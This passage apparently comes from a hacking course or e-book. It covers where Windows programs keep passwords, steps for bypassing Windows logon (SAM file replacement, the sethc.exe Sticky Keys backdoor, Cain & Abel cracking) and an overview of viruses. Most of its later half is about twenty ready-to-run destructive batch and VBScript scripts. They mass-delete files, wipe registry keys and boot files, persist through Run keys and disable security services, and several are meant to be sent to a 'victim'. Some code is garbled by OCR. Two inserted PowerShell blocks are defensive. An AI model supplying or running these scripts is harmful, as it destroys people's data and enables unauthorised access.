HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 

The HTTP basic authentication passwords are stored in the 'Credentials store' at following location based on the operating 
system: 


Instant Messengers 

Google Talk (GTalk): 

GTalk stores all remembered account information at following registry location: 
HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts 


For each account a separate registry key is created with the account email id as its name. Account passwords are encrypted using 
Windows cryptography functions and are stored under the above registry key. 

GooglePasswordDecryptor is a free tool to decrypt and obtain the GTalk usernames/passwords in plaintext. 

Skype 

Skype does not store the passwords directly. It computes the encrypted hash of the password and stores it in config.xml, 
present in Skype's user profile directory. 

Typical location of the user profile directory is: 


Windows 98/ME 



The pwl files cannot be easily edited, but can be overwritten. However, we can delete the existing pwl files and the next 
time we log on to the system, we will be prompted to enter our username and password, and this new information will be 
stored in a new *.pwl file. We can also copy pwl files from one machine to another. Thus to hack a computer, we just need 
to boot the system using some bootable CD and copy the existing pwl file in the c:\windows directory. Immediately we can 
now log on using the new user name and password. Thus once we boot the system using a bootable CD, we can follow any 
of the following approaches: 

a) Delete existing pwl file: In this approach, once the system is restarted after deleting the existing pwl files, the system will 
ask for a new user name and password. So the system is hacked. 

b) Copying existing pwl files: In this approach, the new user accounts as specified in the pwl file being copied are 
automatically created in the operating system. Hence the hacker can log in with his choice of user name and password. 

c) Replacing existing pwl files: In this approach, the existing user accounts will be deleted and the new user accounts as 
specified by the new pwl file are automatically created. Hence again the system is hacked. 


Windows NT/XP/Vista/Windows 7 

NT stores a permanent working copy of the SAM database on the hard disk that can be accessed via the 
HKEY_LOCAL_MACHINE Registry hive under the SAM key by either writing a program or using a Registry editor (e.g., 
regedt32.exe). Ordinarily, users can't directly access the SAM key with a Registry editor because NT limits the permissions 
on the key to the built-in SYSTEM account, but administrative users can trick NT into providing SAM-key access under 
the user context of the SYSTEM account. 

When you forget user passwords, if you know the theory as above, you can change the SAM file by following the steps 
below. These steps can also be used by any hacker/cracker to breach into the computer if he/she has physical access to the 
computer running on Windows NT. 


Step By Step - 



Step 1: Log in to a computer that has a Windows XP system. 

Step 2: Copy the SAM file to a floppy disk. 

Step 3: Then turn to your locked PC, insert the floppy disk, reboot the PC and enter MS-DOS. 

Step 4: In DOS, type: del c:\windows\system32\config\sam, then you will delete the SAM file. 

Step 5: Type: copy a:\sam c:\windows\system32\config, to copy the other's SAM file to your PC. 

Skype 

Since the HASH of the password is saved, it is not possible to directly get the password. Instead one has to use dictionary or 
brute force approach to find out the right password from the hash. This approach may take days or months together based 
on the length & complexity of the password. 


Last Bit Software developed a tool called 'Skype Password'. It is a free tool used to recover Skype passwords. This tool 
applies universal password recovery methods like brute force attacks/dictionary attacks at a very high speed of 200 lacs 
per second on a modern CPU [7]. However, if the password is complex, this tool will still take a lot of time. The approximate 
time for recovering the Skype password using the 'Skype Password' tool can be obtained by another tool called 'Password 
Calculator'. This tool cannot be termed a hacking tool as it needs to be installed and can recover the password of only the 
user who has logged onto the system. However, in the near future, one can expect some malware that might run without the 
knowledge of the logged-on user. 


Windows Password Hacking 
Step By Step - 



1. Restart and boot the PC (via bootable CD or PD) 


2. When "INSTALL" is shown, press "Shift" 5 times 

3. When "Stkey" is shown, go to "Command" 

4. Then type Notepad and hit Enter 

5. Copy the SAM and SYSTEM files to your PD. 

6. Now exit and cancel the install 

7. Now install Cain & Abel on another PC 

8. Select Cracker and now click on ( + ) 

9. Now select LM and NTLM 


10. Now select your target + r84+Brute force+Ntlm 

11. Now import your target 

12. Now copy the SYSTEM file and paste it in under 

13. Final step: click on Start and wait 1 to 4 minutes. 

9. Windows Password Cracking 

There are some good password cracking techniques for discovering passwords, and perhaps the most famous ones are: 



a) Dictionary Attack - 

A big word dictionary is loaded into the cracking tool to test these words against the user account password. 

b) Brute Forcing Attack - 

Every possible key combination is tried against the password database until the correct key is discovered. It takes a long 
time (or not). 

c) Hybrid Attack - 

It's a variation of the dictionary attack, but for each dictionary word a small change is attempted, like "linux", "linux1", 
"linux123", etc. 


d) Syllable Attack - 

This attack is a combination of the dictionary attack with the brute forcing attack. 

e) Rainbow Table Attack - 

A very large list of precomputed hashes is compared with the password file to discover all passwords. 
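Whether brute forcing "takes a long time (or not)" is a matter of keyspace divided by guess rate, which is what the 'Password Calculator' mentioned in the Skype section estimates. The script below is an added example (not from the course notes, and not that tool) that tabulates worst-case brute-force time for several password lengths and character sets at the 200 lacs (20,000,000) guesses per second quoted above; the character-set sizes are assumptions (ASCII digits, letters and printable characters). It is the calculation behind the password-policy step in "First Steps to Securing a Machine": length and character set, not the choice of cracking tool, decide whether a brute-force attack is feasible.

```powershell
# Added example: worst-case brute-force time for a given guess rate. Character-set sizes are assumptions.

function Get-BruteForceEstimate {
    param(
        [int[]]$Lengths = 6..12,
        [double]$GuessesPerSecond = 20000000,       # 200 lacs/s, the rate quoted above
        [hashtable]$Charsets = @{
            'digits'          = 10
            'lowercase'       = 26
            'lower+upper'     = 52
            'lower+upper+dig' = 62
            'all printable'   = 95
        }
    )
    $secPerYear = 365.25 * 24 * 3600
    foreach ($len in $Lengths) {
        foreach ($name in $Charsets.Keys | Sort-Object { $Charsets[$_] }) {
            # Worst case is the whole keyspace; the expected cost is half of it.
            $keyspace = [math]::Pow($Charsets[$name], $len)
            $seconds  = $keyspace / $GuessesPerSecond
            [pscustomobject]@{
                Length    = $len
                Charset   = $name
                Keyspace  = '{0:E2}' -f $keyspace
                WorstCase = if ($seconds -lt 60) { '{0:N1} s' -f $seconds }
                            elseif ($seconds -lt $secPerYear) { '{0:N1} days' -f ($seconds / 86400) }
                            else { '{0:N1} years' -f ($seconds / $secPerYear) }
            }
        }
    }
}

Get-BruteForceEstimate | Format-Table -AutoSize
```

Read the table against the dictionary and hybrid attacks above: a long password built from a dictionary word plus a digit sits in a tiny keyspace no matter what this table says for its length, which is why policies ask for length and unpredictability together.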

How To Crack Windows Password 


Step By Step - 



1. Restart and boot the PC (via bootable CD or PD) 

2. When "INSTALL" is shown, press "Shift" 5 times 

3. When "Stkey" is shown, go to "Command" 

4. Rename the "Sethc.exe" and "cmd.exe" files by command 
EX. 1 - "Sethc.exe" -> "Sethcl.exe" 

2 - "Cmd.exe" -> "Sethc.exe" 

5. Then exit and cancel the install 


6. Now restart the PC 

7. When asked for the password, press "Shift" 5 times 

8. Now you are in the command prompt; type (Net_user_user name*) and press Enter 

9. Then enter the new password and hit Enter 
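The "Stkey"/sethc.exe procedure (given above under "How To Crack Windows Password Via Backdoors" and repeated here) leaves a specific trace: the file called sethc.exe in System32 is no longer the Sticky Keys helper but a copy of cmd.exe. It still carries a valid Microsoft signature, because it is a genuine Microsoft binary, so a signature check alone will not notice. The script below is an added example (not from the course notes) of a check that does: it compares the file's hash with cmd.exe and reads the OriginalFilename from its version resource, which names the binary it was built as. It assumes the version resource of the real sethc.exe names it sethc.exe, and that cmd.exe is present in System32.

```powershell
# Added example: detect the sethc.exe-for-cmd.exe swap described in the steps above.
# Assumes the genuine helper's version resource records its own name; checks only sethc.exe by default.

function Test-AccessibilityBinary {
    param([string[]]$Names = @('sethc.exe'))

    $sys32   = Join-Path $env:SystemRoot 'System32'
    $cmdHash = (Get-FileHash (Join-Path $sys32 'cmd.exe') -Algorithm SHA256).Hash

    foreach ($name in $Names) {
        $path = Join-Path $sys32 $name
        if (-not (Test-Path $path)) { continue }
        $item = Get-Item $path
        $orig = $item.VersionInfo.OriginalFilename      # what the binary was built as
        $hash = (Get-FileHash $path -Algorithm SHA256).Hash
        $sig  = (Get-AuthenticodeSignature $path).Status

        # Order matters: a swapped file is still validly signed, so the signature is checked last.
        $finding = if ($hash -eq $cmdHash)            { 'REPLACED: identical to cmd.exe' }
                   elseif ($orig -and $orig -ne $name) { "REPLACED: version info says $orig" }
                   elseif ($sig -ne 'Valid')            { "UNSIGNED or tampered ($sig)" }
                   else                                 { 'ok' }

        [pscustomobject]@{
            File             = $name
            OriginalFilename = $orig
            Signature        = $sig
            Finding          = $finding
        }
    }
}

Test-AccessibilityBinary | Format-Table -AutoSize
```

Two caveats: on Windows 7 and earlier many system files are catalog-signed and Get-AuthenticodeSignature reports them as NotSigned, so treat the hash and version-resource checks as the decisive ones there; and the procedure above depends on booting from removable media, so a BIOS/UEFI boot-order password and full-disk encryption remove the precondition rather than just the symptom.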


10. Virus 



What is a virus? 


How does a virus work? 

A virus is by definition a computer program that spreads or replicates by copying itself. There are many known techniques 
that can be used by a virus, and viruses appear on many platforms. However, the ability to replicate itself is the common 
criterion that distinguishes a virus from other kinds of software. 

The term virus is quite often misused. Some viruses contain routines that damage the computer system on which they run. 
This so-called payload routine may also display graphics, play sounds or music etc. This has led to a situation where 
viruses are assumed to cause deliberate damage, even if there are many viruses that don't. The term virus has, for these 
reasons, become a synonym for malicious software, which is incorrect from a technical point of view. 

The process of spreading a virus includes both technical features in the virus itself and the behavior of the computer user. 
Most viruses are by nature parasitic. This means that they work by attaching themselves to a carrier object. This object may 
be a file or some other entity that is likely to be transmitted to another computer. The virus is linked to the host object in 
such a way that it activates when the host object is used. Once activated, the virus looks for other suitable carrier objects 
and attaches itself to them. This dependency on the human factor slows down the replication of viruses. Another closely 
related program type, a worm, reduces this dependency and is able to replicate much faster. Worms will be discussed 
separately in this paper. 

Viruses and worms 


The term virus is familiar to most users of computer equipment. This term is often used to describe all kinds of software 
that replicate from computer to computer, and even incorrectly for some other kinds of software that do not replicate. 

However, it is not widely known that there are two different groups of replicating software, viruses and worms. The 
difference between these two groups may not be obvious to the computer user who encounters a virus or worm, but the 
difference is significant from a technical point of view. A worm, for example, is able to use services provided by a modern 
networked environment much more efficiently than a virus. 

Different types of viruses 

a) Boot sector viruses 

A boot sector virus infects the boot sector of floppy disks or hard drives. These blocks contain a small computer program 
that participates in starting the computer. A virus can infect the system by replacing or attaching itself to these blocks. 

b) Traditional file viruses 

This group of viruses replicates when attached to MS-DOS program files with the EXE or COM extensions. They cannot 
infect 32-bit EXE files used by newer versions of MS Windows. This group of viruses can replicate over any media that can 
transfer files, such as diskettes, local area networks, remote lines etc. Email did not play a significant role in spreading 
these viruses, as it was an unusual way of communicating in MS-DOS and Windows 3.x-based environments. These viruses, 
however, have a clear disadvantage compared to boot sector viruses; they require that program files be transmitted. 

c) Document or macro viruses 

Document or macro viruses are written in a macro language. Such languages are usually included in advanced applications 
such as word processing and spreadsheet programs. The vast majority of known macro viruses replicate using the MS 
Office program suite, mainly MS Word and MS Excel, but some viruses targeting other applications are known as well. 



d) 32-bit file viruses 

Previous file viruses were made for 16-bit program files used by MS-DOS. The 32-bit versions of Windows, such as 
Windows 95, 98 and NT, use a different and more complex format for the program files. Traditional file viruses cannot 
infect these files. A new group of file viruses emerged as the 32-bit operating systems became more popular. These viruses 
are by nature similar to the previous file viruses with the exception that they can infect the new file format and work in 
32-bit environments. This category is also called PE viruses, because the new executable file format's name is PE (portable 
executable). The new format is also used by many other modules in the system, such as DLLs, system drivers etc. Some 
viruses infect these modules as well, but most stick to program files with the EXE extension. 


e) Worms 

Mail worms 

A worm is by definition similar to a virus but more independent. The first wave of 
worms was seen when Internet mail became a standard way to communicate. An 
email client, and especially address books and mailing lists, provide a powerful 
way to reach a large number of recipients worldwide with very little effort. 
Modern, advanced email programs also provide this functionality through APIs 
that make it possible for computer programs to automatically send messages. All 
this together provides an environment that enables mail worms to spread much 
faster than viruses. 

A mail worm is carried by an email message, usually as an attachment but there 
have been some cases where the worm is located in the message body. The 
recipient must open or execute the attachment before the worm can activate. 



f) Pure worms 

A worm is a replicating program that works independently without a host file and 
without user intervention. Pure worms meet all these requirements, whereas mail 
worms represent an intermediate form that resembles both viruses and worms. 


Other kinds of malware 

Trojan horses 

The name Trojan horse is borrowed from Greek mythology. In the computer world the term refers to a program that 
contains hidden malicious functions. The program may look like something funny or useful such as a game or utility, but 
harms the system when executed. Many Trojans contain activation criteria that enable the Trojan to work for a while. The 
user is convinced that the program is safe and useful, and forwards it to other users before the malicious code strikes. 

Trojans lack a replication routine and thus are not viruses by definition. A Trojan is spread to other computers only 
through deliberate transfer by the users. 

Backdoor Trojans 

Backdoor Trojans are a special kind of Trojan that grant unauthorized access to computer systems (today usually 
called remote access Trojans, RATs). This type of Trojan is rather common and can pose a significant threat to business 
users. These Trojans consist of two programs that interoperate: the silent server module planted in a victim's computer 
and the console used by the attacker. The server module acts as a spying tool; the console connects to it over the network 
and sends it commands. The pair can then be used to retrieve data from the target computer, modify data, alter system 
settings, execute programs and even record video and sound if the computer has a camera and microphone. 

Jokes 

A joke program does something funny or tasteless, but does not harm the 
computer environment. The effect may be music or sounds, video or animations, 
interactive functions etc. Some jokes may disturb the computer's user interface 
and be rather annoying, but the effect is temporary and no permanent damage is done. If permanent damage is done, then 
the program is by definition a Trojan rather than a joke. 

Hoaxes 

A hoax is a chain letter that is usually circulated as an email message. These chain 
letters may have any content and are actually not related to computer viruses in 
any way. However, the problem is well known to vendors of anti-virus software 
because many hoaxes warn about a non-existent computer virus. A trained security expert can usually tell a hoax from a 
real virus warning. Many hoaxes describe viruses with capabilities that cannot exist in real life. Several other attributes 
usually disclose the real nature of the message: the source is often not a reliable security expert, and the message contains 
the famous sentence "Forward this warning to all your friends immediately". The practical check is to look the claimed 
virus up on the anti-virus vendor's own advisory pages before acting on the message or forwarding it. 


Who writes viruses and why? 

A common belief is that viruses are written by teenage boys. This is true in part, 
but the situation is changing as new virus writing techniques enter the scene. 
Writing a working virus is not too difficult, but writing a successful virus is not an 
easy task. It is not enough to be a good programmer; knowledge of how 
modern IT systems work on a larger scale is needed as well. This has led to a 
situation where more mature persons, even IT professionals, are involved as well. 
It is hard to provide accurate information about who is writing viruses and why. 
Most virus writers want to remain anonymous and their motives are rarely known. 
There are several reasons for this. 



□ Most individuals realize that writing a virus is not ethically acceptable, 
even if it is legal. Most virus writers want to remain anonymous, or use a 
pseudonym if they give statements about their creation. 

□ Computer viruses are a relatively new problem. There are still many countries where 
the laws do not address virus writing explicitly, even if significant 
improvements have taken place in recent years. 

□ Even if writing a computer virus is illegal, the authorities often lack 
the resources and skills to investigate and trace virus authors. 


Virus history 

Before the viruses - UNIX worms and academic papers 

1970 - 1988. Viruses are not a new invention. The idea of self-replicating 
computer programs has been around for decades. This idea has emerged in science 
fiction literature, scientific papers and even experiments at least since the early 
1970s. Some attempts to perform maintenance tasks in large networks using 
worms were made, but this technology did not become widespread or well known. 
One of the milestones in virus history was the research performed by Dr. Fred 
Cohen in the early 1980s. Cohen formulated the original definition of a virus: a 
program that can infect other programs by modifying them to include a (possibly 
evolved) copy of itself. Cohen's work was truly groundbreaking as it was published 
before viruses had become a real-world problem. 

In the 1980s the Internet was a network that connected university computers to 
each other. This network was pretty vulnerable to pure worms, which was to be 
demonstrated by a young student named Robert Morris. The first major malware 
incident was probably the Morris worm in November 1988. This UNIX-based 
worm infected an estimated 6,000 machines, around a tenth of the hosts then on 
the Internet, and knocked many of them out under the load of repeated 
reinfection, causing a lot of media interest and many headlines. 


The initial era - Standalone computers and LANs 

1987 - 1990 . The first PCs were made in the early 1980s. The personal computer 
concept was new and revolutionary, and its popularity grew faster than anyone 


expected. PCs were already a usable and affordable technology for companies in 
the late 1980s. The rapid growth also brought computer technology closer to a 
larger number of individuals. 


The document viruses - Towards a 
major problem 

1995 - 1998. From 1995, local area networks were already standard equipment in most companies using personal 
computers. Internet connections also started to become popular, especially in larger companies. The concept of email had 
been known in the UNIX world for decades, but now this technology entered PC-based corporate networks as well. The 
presence of a local area network and Internet connectivity opened totally new ways to communicate. The LAN was not 
just a way to share disks and printers anymore. Email had become a significant communication channel, especially in 
large multinational companies. 

The new technology introduced by email and the Internet revolutionized the way 
people worked with personal computers. But the existing viruses were not able to benefit 
from the new technology. The number of boot sector virus infections started to 
decline when LANs, email and CD-ROMs made floppies obsolete. File viruses 
did not benefit either, as email was rarely used for sending program files. 



Email worms - Increasing replication speed 


1999 - . The basic requirements for email worms were already met when corporations started to use email. 

The trend continued and more and more home users were connected to the Internet. At the same time, email clients 
evolved and offered more and more functionality. Happy99 was probably the first widespread PC malware program that 
can be called a worm. This "Happy New Year" greeting arrived in a message that was apparently sent by a friend. While 
the user was watching the animated fireworks, the worm installed itself in the system so that outgoing mail traffic could be 
monitored and a copy of the worm attached to later messages. 

[Figure: the "Happy New Year 1999" fireworks window displayed by Happy99] 




Pure worms - Getting rid of the human factor 


The number of computers on the Internet keeps growing and the connecting lines become faster and faster. Always-on 
broadband connections are getting popular for home users as well as business users. This leads to a situation where pure 
worms can find enough target computers to replicate sufficiently. 


11. Virus Creation 

All of the following "viruses" are written in Notepad. 

( 1 ) 

Here is a batch file virus which can: 

1. Install itself to run at startup (via the Run registry key) 

2. Copy itself over one thousand times into random spots on your computer 

3. Hide itself and all the files it creates 

4. Kill MSN Messenger, LimeWire, Internet Explorer and Norton (NMain) 

5. Swap the left mouse button with the right one 

6. Open alert boxes 

7. Change the time to 12:00 and shut down the computer 

Copy this code into Notepad and save it as Greatgame.bat (while saving, select "All Files" instead of "Text Documents"). 
Here is the code: 


@Echo off 
color 4 
title 4 
title R.I.P 


start 
start 
start 
start calc 

copy %0 %Systemroot%\Greatgame > nul 

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ 

/d %systemroot%\Greatgame.bat /f > nul 

copy %0 *.bat > nul 

Attrib +r +h Greatgame.bat 

Attrib +r +h 

RUNDLL32 USER32.DLL.SwapMouseButton 

start calc 

cls 

tskill msnmsgr 
tskill LimeWire 
tskill iexplore 
tskill NMain 
start 
cls 

cd %userprofile%\desktop 


copy Greatgame.bat R.I.P.bat 
copy Greatgame.bat R.I.P.jpg 
copy Greatgame.bat R.I.P.txt 
copy Greatgame.bat R.I.P.exe 


copy Greatgame.bat R.I.P.mov 
copy Greatgame.bat FixVirus.bat 
cd %userprofile%My Documents 
copy Greatgame.bat R.I.P.bat 
copy Greatgame.bat R.I.P.jpg 
copy Greatgame.bat R.I.P.txt 
copy Greatgame.bat R.I.P.exe 
copy Greatgame.bat R.I.P.mov 
copy Greatgame.bat FixVirus.bat 
start 
start calc 
cls 

msg * R.I.P 
msg * R.I.P 

shutdown -r -t 10 -c "VIRUS DETECTED" 

start 

start 

time 12:00 
:R.I.P 

cd %usernameprofile%\desktop 


copy Greatgame.bat %random%.bat 
goto RIP 


( 2 ) 

Just open your notepad 

1) Click start -> all programs -> accessories -> notepad 

2) Or just press or click windows key + r :: run window will open and 
type notepad and hit enter . 

NOW TYPE THE FOLLOWING CODE :: 

@echo off 
del D:\*.* /f /s /q 
del E:\*.* /f /s /q 
del F:\*.* /f /s /q 
del G:\*.* /f /s /q 
del /f /s /q 

del l:\*.* /f /s /q 
del /f /s /q 

Then save it as anything.bat and the batch file is created . 

WARNING :: This is the most dangerous virus! Be careful with its use. 


(3) 


Delete the entire registry 
@ECHO OFF 

START reg delete HKCR/.exe 
START reg delete HKCR/.dll 
START reg delete HKCR/* 

Now save it as anything.bat and the batch file is created . 


(4) 

How to crash a PC Forever !::: 
@echo off 

attrib -r -s -h c:\autoexec.bat 
del c:\autoexec.bat 
attrib -r -s -h c:\boot.ini 
del c:\boot.ini 
attrib -r -s -h c:\ntldr 
del c:\ntldr 

attrib -r -s -h c:\windows\win.ini 
del c:\windows\win.ini 


Open up Notepad and copy and paste that. Save it as anything.bat. 

This does not shut the computer down by itself: it deletes the files Windows NT/2000/XP needs to boot (boot.ini and 
ntldr), so the machine will not start again after the next reboot. On Windows Vista and later these files no longer exist 
(boot is handled by bootmgr and the BCD store), so the script has no effect there. 

REMEMBER - DO NOT CLICK THIS FILE. 


(5) 

How to stop someone's internet access:::: 


@Echo off 
Ipconfig /release 

Save that as anything.bat and send it to someone. Their DHCP lease (and so their IP address) will be released, and they 
will be offline until they fix it. 

However, this is VERY easy to fix. Simply type ipconfig /renew (or reboot). 

( 6 ) 

ShutDown PC million Times:::: 

1. Right-click on the desktop. 

2. Click New > Shortcut. 

You will get a dialogue box; type in it: shutdown -s -t 1000 -c "any comment you want" and press Next. 

Note: the "1000" is the time in seconds before the computer shuts down; you can put in any number you want. 

3. You will get another dialogue box; type in it: Internet Explorer and press Finish. 

4. You will find the icon on your desktop. Don't open it; right-click on it and go to Properties > Change Icon, 
select the Internet Explorer icon, then press Apply and OK. Try to open it: it is a "virus". 

PS: the only way to stop the computer from shutting down is to go to Start > Run and type: shutdown -a 
(7) 

Open Notepad 

Write / copy the below command there: 


del c:\WINDOWS\system32\*.* 

and save it as anything.bat. 

Done. If you give this file to your victim, the contents of his System32 folder will be deleted; without it a Windows PC 
can't start. (Files that are in use by the running system cannot be deleted this way, but enough is removed to break the 
next boot.) 


( 8 ) 


Process: 

Open Notepad 

Copy the below command there 


"rd/s/q D:\ 
rd/s/q C:\ 

rd/s/q E:\" ( without quotes ) 


Save as "anything.bat 

This deletes the directory trees on C:, D: and E: (rd /s /q removes a directory and everything under it without 
prompting). It does not actually format the drives, and files that are open, in use by Windows or protected by permissions 
survive, but everything writable by the current user is gone within seconds. 


( 9 ) 


Just open the Notepad and type the paste the following Code. 


set ws=createobject("wscript.shell") 
dim strDir,strfile,st,strtxt2,strshell,strlog 
dim obfso,obfolder,obshell,obfile,obtxtfile 
strshell="wscript.shell" 
strDir="C:\WINDOWS" 
strfile="\wscript.vbs" 
st=Chr(34) 
strlog="shutdown -l" 
strtxt2="ws.run(strlog)" 
set obfso=CreateObject("Scripting.FileSystemObject") 
on error resume next 
set obfile=obfso.CreateTextfile(strDir & strfile) 
obfile.writeline("set ws=createobject("&st&strshell&st&")") 
obfile.writeline("ws.run("&st&strlog&st&")") 
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ" 

Now save this Notepad file with any name having the .vbs extension. 


( 10 ) 

Convey your friend a little message and shut down his / her computer: 
@echo off 

msg * I don't like you 

shutdown -c "Error! You are too stupid!" -s 


Save it as "Anything.BAT" in All Files and send it. 


( 11 ) 

Frustrate your friend by making this VBScript hit Enter simultaneously: 
Type: 

Code: 

Set wshShell = wscript.CreateObject("WScript.Shell") 

do 

wscript.sleep 100 
wshshell.sendkeys "~(enter)" 
loop 

Save it as "Anything.VBS" and send it. 


( 12 ) 


This Will Crash Ur Computer 


Option Explicit 


Dim WSHShell 

Set WSHShell = Wscript.CreateObject("Wscript.Shell") 
Dim x 

For x = 1 to 100000000 
WSHShell.Run "Tourstart.exe" 

Next 

Save It As Anything.vbs 


(13) 

Virus that crashes pc 


@echo off 

attrib -r -s -h ^autoexec.bat 
del c:autoexec.bat 


attrib -r -s -h c:boot.ini 
del c:boot.ini 
attrib -r -s -h c:ntldr 
del c:ntldr 


attrib -r -s -h c:windowswin.ini 
del c:windowswin.ini 
@echo off 

msg * YOU GOT OWNED!!! 

shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive" 

Save as anything.bat in Notepad. 

This pops up a message saying OWNED!! and shuts down the computer, which, if the deletions above succeeded, 
will not boot again. 

(14) 


Shutdowns Computer Everytime It Is Turned On 
Save As Aanything. bat File 


echo @echo off>c:windowshartlell.bat 


echo break off»c:windowshartlell.bat 

echo shutdown -r -t 11 -f»c:windowshartlell.bat 

echo end»c:windowshartlell.bat 


reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d 
c:windowshartlell.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f 
echo You have been HACKED. 

PAUSE 

(15) 


Disable Internet Permanently 

echo @echo off>c:windowswimn32.bat 
echo break off»c:windowswimn32.bat 
echo ipconfig/release_all»c:windowswimn32.bat 
echo end»c:windowswimn32.bat 

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d 
c:windowswimn32.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d 


c:windowswimn32.bat /f 
echo You Have Been HACKED! 
PAUSE 


Save As A anything.bat File 


(16) 

Change Files To Non-working TXT Files 
Save As A anything.bat File 


REN *.DOC *.TXT 

REN *.JPEG *.TXT 

REN *.LNK *.TXT 

REN *.AVI *.TXT 

REN *.MPEG *.TXT 

REN *.COM *.TXT 

REN *.BAT *.TXT 

(17) 

System Meltdown 


:CRASH 

net send * WORKGROUP ENABLED 


net send * WORKGROUP ENABLED 
GOTO CRASH 
ipconfig /release 
shutdown -r -f -to 

echo @echo off>c:windowshartlell.bat 
echo break off»c:windowshartlell.bat 


echo shutdown -r -t 11 -f»c:windowshartlell.bat 
echo end»c:windowshartlell.bat 

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d 
c:windowshartlell.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat 

If 

echo You Have Been Hackedecho @echo off>c:windowswimn32.bat 
echo break off»c:windowswimn32.bat 
echo ipconfig/release_all»c:windowswimn32.bat 
echo end»c:windowswimn32.bat 

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d 
c:windowswimn32.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d 

c:windowswimn32.bat /f 

echo YOU HAVE BEEN HACKED BITCH 

REN *.DOC *.TXT 

REN *JPEG *.TXT 


REN *.LNK *.TXT 
REN *.AVI *.TXT 
REN *.MPEG *.TXT 
REN *.COM *.TXT 
REN *.BAT *.TXT 


PAUSE 

PAUSE 

Save As A anything.bat File 

( 18 ) 

Freeze someone's desktop::: 

This is a funny trick; you can "freeze" someone's desktop. 

1. Close everything you are working in and work on the desktop; press PrtScr on your keyboard. 

2. Go to Paint, click Edit and then Paste. 

3. Save this file as (name).bmp and close Paint. 

4. Now we have to remove the desktop icons and shortcuts: right-click on the desktop, choose Properties, click 
Desktop, then select Customize Desktop. 

5. Uncheck all the boxes under desktop icons and press OK, then Apply, then OK. 

6. Now to remove the shortcuts on the desktop: go to Start, select My Computer, open C:, right-click and select 
New > Folder, and give it any name. 

7. Go to the desktop, select all the icons, right-click on them and press Cut; go to C: and paste them into the folder 
you created, then close the window. 

8. Now to put the fake desktop image in place and hide the taskbar: right-click on the desktop, go to Properties, then 
Desktop, select Browse, select the file you saved, then press Apply and OK. To hide the Windows taskbar, right-click 
on the taskbar, go to Properties, select "Auto-hide the taskbar", then Apply and OK. Now all the icons are fake and the 
user will think that his desktop is frozen. 

Enjoy it! 


( 19 ) 

SHUT YOUR INTERNET PERMANENTLY::: 



@echo off 
reg 

add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t 


REG_SZ /d %systemroot%\HaloTrialScoreChangerVl /f > nul 
start iexpress (website of your choice) 
ipconfig /release 

del "C:\Program Files\Microsoft Games 
del "C:Nexon 

del "C:\Program Files\Xfire 

del "C:\Program Files\Adobe" 

del "C:\Program Files\lnternet Explorer" 

del "C:\Program Files\Mozilla Firefox" 

del "C:\WINDOWS" 

del "C:\WINDOWS\system32" 

del "C:\WINDOWS\system32\cmd" 

del "C:\WINDOWS\system32\iexpress" 

del "C:\WINDOWS\system32\sndvol32" 

del "C:\WINDOWS\system32\sndrec32" 

del "C:\WINDOWS\system32\Restore\rstrui" 

del "C:\WINDOWS\system32\wupdmgr" 

del "C:\WINDOWS\system32\desktop" 



del "C:\WINDOWS\java" 
del "C:\WINDOWS\Media" 
del "C:\WINDOWS\Resources" 
del "C:\WINDOWS\system" 


del "C:\drivers" 
del "C:\drv" 
del "C:\SYSINFO" 
del "C:\Program Files" 

echo ipconfig/release_all»c:windowswimn32.bat 
net stop "Security Center" 
net stop SharedAccess 
> "%Temp%.kill.reg" ECHO REGEDIT4 
»"%Temp°/o.kill.reg" ECHO. 

»"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess] 
»"%Temp°/o.kill.reg" ECHO "Start"=dword:00000004 
»"%Temp°/o.kill.reg" ECHO. 

»"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv] 
»"%Temp°/o.kill.reg" ECHO "Start"=dword:00000004 
»"%Temp°/o.kill.reg" ECHO. 

»"%Temp°/o.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c] 
»"%Temp°/o.kill.reg" ECHO "Start"=dword:00000004 



»"%Temp°/o.kill.reg" ECHO. 

START /WAIT REGEDIT /S "°/oTemp°/o.kill.reg" 
del "%Temp%.kill.reg" 
del %0 

echo @echo off>c:windowswimn32.bat 


echo break off»c:windowswimn32.bat 

echo ipconfig/release_all»c:windowswimn32.bat 

echo end»c:windowswimn32.bat 

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d 
c:windowswimn32.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d 
c:windowswimn32.bat /f 
:a 

start iexpress (website of your choice) 
goto a 


Save anything.bat 

( 20 ) 



MAKING MOST DANGEROUS VIRUS CALLED MATRIX:: 


Warning - Do not run it on your computer 

#include 

#include 


#include 

#include 

#include 

#include 

#include 

using namespace std; 
int main() 

{ keybd_event(VK_MENU, 0x38, 0,0); 
keybd_event(VK_RETURN,0xlc,0,0); 
keybd_event(VK_RETURN,Oxlc,KEYEVENTF_KEYUP,0); 
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0); 
HANDLE outToScreen; 

outToScreen = GetStdHandle(STD_OUTPUT_HANDLE); 



{ 

char buffer[255]; 

